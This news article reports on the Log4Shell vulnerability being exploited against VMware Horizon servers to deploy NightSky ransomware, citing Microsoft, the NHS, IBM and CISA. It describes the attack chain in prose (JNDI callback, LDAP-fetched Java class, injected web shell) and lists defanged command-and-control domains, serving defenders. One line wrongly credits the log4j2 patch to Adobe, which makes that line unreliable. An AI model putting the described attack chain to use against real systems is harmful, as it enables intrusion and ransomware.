Log4Shell bug used to deploy NightSky ransomware on VMware Horizon, says Microsoft

Threat actors continue trying to exploit the vulnerabilities in the open-source Apache log4j2 library collectively known as Log4Shell, according to security researchers, meaning IT teams have to work faster at finding and remediating evidence of the bugs in their software.

The latest warning comes from Microsoft, which said Monday that as early as January 4, attackers from a China-based ransomware operator it calls DEV-0401 started exploiting the CVE-2021-44228 vulnerability in internet-facing systems running VMware Horizon. “Our investigation shows that successful intrusions in these campaigns led to the deployment of the NightSky ransomware,” Microsoft said in its cumulative blog on Log4Shell.

Microsoft’s report follows a January 5th alert by the U.K.’s National Health Service that attackers are actively targeting Log4Shell vulnerabilities in VMware Horizon servers in an effort to establish web shells. The attack likely consists of a reconnaissance phase, where the attacker uses the Java Naming and Directory Interface (JNDI) via Log4Shell payloads to call back to malicious infrastructure, said the alert. The attack exploits the Log4Shell vulnerability in the Apache Tomcat service which is embedded within VMware Horizon, it adds.

“Once a weakness has been identified, the attack then uses the Lightweight Directory Access Protocol (LDAP) to retrieve and execute a malicious Java class file that injects a web shell into the VM Blast Secure Gateway service. The web shell can then be used by an attacker to carry out a number of malicious activities such as deploying additional malicious software.”

VMware has issued remediation advice and patches for a wide range of its products.

Developers and IT administrators should note the latest Adobe patch for log4j2 for those running Java 8 is 2.17.1.

Microsoft said DEV-0401 has previously deployed multiple ransomware families, including LockFile, AtomSilo, and Rook, and has similarly exploited Internet-facing systems running Confluence (CVE-2021-26084) and on-premises Exchange servers (CVE-2021-34473).

Based on Microsoft’s analysis, DEV-0401 is using command and control (CnC) servers that spoof legitimate domains. These include service[.]trendmrcio[.]com, api[.]rogerscorp[.]org, api[.]sophosantivirus[.]ga, apicon[.]nvidialab[.]us, w2zmii7kjb81pfj0ped16kg8szyvmk.burpcollaborator[.]net, and 139[.]180[.]217[.]203.

Also on Monday IBM updated its response to log4j2, including an updated list of products that aren’t affected by the vulnerabilities. However, it also said that list is not final.

Meanwhile, SC Media reports that the U.S. Cybersecurity and Infrastructure Security Agency said Monday that no  “significant intrusions” related to the log4j vulnerability have yet been found in the systems of U.S. federal agencies or critical infrastructure sectors.

However, the agency also warned sophisticated adversaries may have already compromised targets and are just waiting to leverage their new access.

The CISA says IT administrators should

• discover all internet-facing assets that allow data inputs and use Log4j Java library anywhere in the stack;
• discover all assets that use the Log4j library;
• update or isolate affected assets. Assume your environment has been compromised,  the agency says. Identify common post-exploit sources and activity, and hunt for signs of malicious activity;
• monitor for odd traffic patterns (e.g., JNDI LDAP/RMI outbound traffic, DMZ systems initiating outbound connections).

Would you recommend this article?


Thanks for taking the time to let us know what you think of this article!
We'd love to hear your opinion about this or any other story you read in our publication.

Jim Love, Chief Content Officer, IT World Canada

Featured Download

Howard Solomon
Howard Solomon
Currently a freelance writer, I'm the former editor of ITWorldCanada.com and Computing Canada. An IT journalist since 1997, I've written for several of ITWC's sister publications including ITBusiness.ca and Computer Dealer News. Before that I was a staff reporter at the Calgary Herald and the Brampton (Ont.) Daily Times. I can be reached at hsolomon [@] soloreporter.com

Related Tech News

Featured Tech Jobs


CDN in your inbox

CDN delivers a critical analysis of the competitive landscape detailing both the challenges and opportunities facing solution providers. CDN's email newsletter details the most important news and commentary from the channel.